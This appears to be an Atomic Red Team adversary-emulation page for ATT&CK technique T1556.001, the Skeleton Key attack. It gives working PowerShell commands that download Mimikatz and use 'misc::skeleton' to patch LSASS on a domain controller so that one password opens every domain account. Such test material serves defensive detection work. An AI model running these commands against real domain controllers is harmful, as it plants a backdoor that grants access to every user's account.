# T1556.001 - Modify Authentication Process

## Description from ATT&CK
Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts.

Malware may be used to inject false credentials into the authentication process on a domain controller with the intent of creating a backdoor used to access any user’s account and/or credentials (ex: Skeleton Key). Skeleton key works through a patch on an enterprise domain controller authentication process (LSASS) with credentials that adversaries may use to bypass the standard authentication system. Once patched, an adversary can use the injected password to successfully authenticate as any domain user account (until the the skeleton key is erased from memory by a reboot of the domain controller). Authenticated access may enable unfettered access to hosts and/or resources within single-factor authentication environments.

## Skeleton Key
A Skeleton Key is used to patch an enterprise authentication process with a backdoor password. It allows adversaries the standard authencation system to use a defined password for all accounts authenticating to that domain controller. The malware used in a skeleton key attack injects false credentials into domain controllers with the intent of creating a backdor password. Functionality similar to Skeleton Key is included as a module in Mimikatz

### MITRE ATT&CK Technique
[Source](https://attack.mitre.org/techniques/T1556/001)
### Skeleton Key Information
[Source](https://attack.mitre.org/techniques/software/S0007)

## Atomic Tests
- Atomic Test #1: Skeleton Key Attack with Mimikatz

### Atomic Test #1: Skeleton Key Attack with Mimikatz

Adversaries can utilize a skeleton key attack to inject false credentials into domain controllers with the intent of creating a backdoor password. Mimikatz can be utilized to perform this attack.

Upon successful execution of the attack, the attacker can use the password Mimikatz to log into the domain controller, no matter the attack. This attack must be performed on a domain controller that is isolated from other domain controllers in your environment and should not be tested on a production domain controller. 

**Supported Platforms:** Windows

**auto_generated_guid:** 

#### Attack Commands: Run with 'powershell'! Elevation is required and you must be on the DC either physically or through RDP.

```powershell
$mimikatz_path = "#{mimikatz_path}"
Write-Host "Injecting Skeleton Key into LSASS"
& $mimikatz_path "privilege::debug" "misc::skeleton" "exit"
Write-Host "Injection complete, you can now authenticate with any user with the password 'mimikatz'"
```
#### Cleanup Commands
```powershell
Remove-Item -Path "#{directory_path}" -Recurse
Restart-Computer -Force
```

#### Dependencies
Mimikatz must be installed on the machine. By default, the pre-req command will pull mimikatz for ParrotSec's git via powershell and drop it in the folder "C:\ExternalPayloads\Mimikatz"
```powershell
New-Item -Type Directory "#{directory_path}"
Invoke-WebRequest -Uri "#{mimikatz_url}" -Outfile "#{file_path}"
Expand-Archive -LiteralPath "#{file_path}" -DestinationPath "#{zipped_path}"
```
Testing for the dependency:
```powershell
$mimikatz_path = cmd /c echo #{file_path}
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
```



